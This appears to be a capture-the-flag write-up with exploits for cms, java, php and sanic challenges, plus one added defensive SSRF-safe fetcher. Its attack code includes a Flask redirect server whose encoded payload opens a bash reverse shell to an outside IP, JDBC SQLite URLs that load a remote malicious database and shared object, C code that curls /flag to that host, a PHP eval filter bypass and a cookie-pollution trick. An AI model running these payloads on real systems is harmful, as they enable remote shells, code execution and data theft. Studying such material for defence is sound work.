cms

The system API includes a qrcode endpoint.

Pass it a URL parameter and use the resulting SSRF to reach flag.php.

rev has an additional verification step.

from flask import Flask, redirect, send_from_directory
app = Flask(__name__)

flag = 0
@app.route('/')
def example_redirect():
    global flag

    # First request: serve a real PNG so the fetcher's image check passes.
    # Every later request: 302 to the internal flag.php instead.
    if flag != 0:
        return redirect('http://127.0.0.1/flag.php?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%36%35%2e%31%35%34%2e%35%2e%32%32%31%2f%39%39%39%39%20%3c%26%31%27', code=302)
    else:
        flag += 1
        res = send_from_directory('.', '1.png')
        res.headers['Content-Type'] = 'image/png'
        return res

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
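
The image-then-redirect trick above works because the fetcher behind the qrcode endpoint only validates the first hop. As an added defensive example (not part of the original writeup or the challenge code), here is a fetcher that re-applies an SSRF policy to the initial URL and to every redirect Location; fetch_image, RedirectPolicy and the blocked-range list are my own hypothetical names.

```python
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urlparse

def _is_blocked_ip(ip: str) -> bool:
    # Loopback, RFC1918, link-local (cloud metadata), multicast etc. are never
    # valid destinations for a server-side image fetch.
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)

def resolve_host(host: str) -> list:
    """IPs a host maps to; an IP literal (with or without []) maps to itself."""
    try:
        return [str(ipaddress.ip_address(host.strip('[]')))]
    except ValueError:
        pass  # not a literal, fall through to DNS
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_safe_fetch_target(url: str) -> bool:
    """Policy applied to the initial URL and to every redirect Location."""
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https') or not parsed.hostname:
        return False
    try:
        ips = resolve_host(parsed.hostname)
    except socket.gaierror:
        return False
    return bool(ips) and not any(_is_blocked_ip(ip) for ip in ips)

class RedirectPolicy(urllib.request.HTTPRedirectHandler):
    """Re-check policy on each 3xx hop, so a server that first serves a
    harmless PNG and then 302s to 127.0.0.1 is stopped at the redirect."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if not is_safe_fetch_target(newurl):
            raise urllib.error.HTTPError(
                newurl, code, 'redirect target blocked by SSRF policy', headers, fp)
        return super().redirect_request(req, fp, code, msg, headers, newurl)

def fetch_image(url: str, timeout: float = 5.0) -> bytes:
    """Hypothetical hardened fetcher for a qrcode-style endpoint."""
    if not is_safe_fetch_target(url):
        raise ValueError('initial URL blocked by SSRF policy')
    opener = urllib.request.build_opener(RedirectPolicy)
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()
```

Resolving a hostname and then letting the transport resolve it again leaves a DNS-rebinding window, so in production pin the checked IP for the actual connection rather than re-resolving.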

java

{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/evil.db","tableName":"trigger_action_table"}
{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/hack.so"}

Compile a .so file:

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Constructor runs as soon as the shared object is loaded into the process. */
__attribute__ ((__constructor__)) void preload (void)
{
    system("curl 165.154.5.221:9999?flag=`cat /flag`");
}

This exploits the SQLite JDBC vulnerability.

A CREATE VIEW is used to hijack the driver's SELECT: when the driver runs its fixed SELECT statement, the view redirects it into a call to load_extension().

php

php -r eval\(hex2bin\(substr\('_6c73',1\)\)\)\;

Alternatively, a race condition also works.

sanic

Python "prototype chain" (class) pollution.

First set the cookie; for the semicolon use adm\073n.

The \073 octal escape bypasses the filter.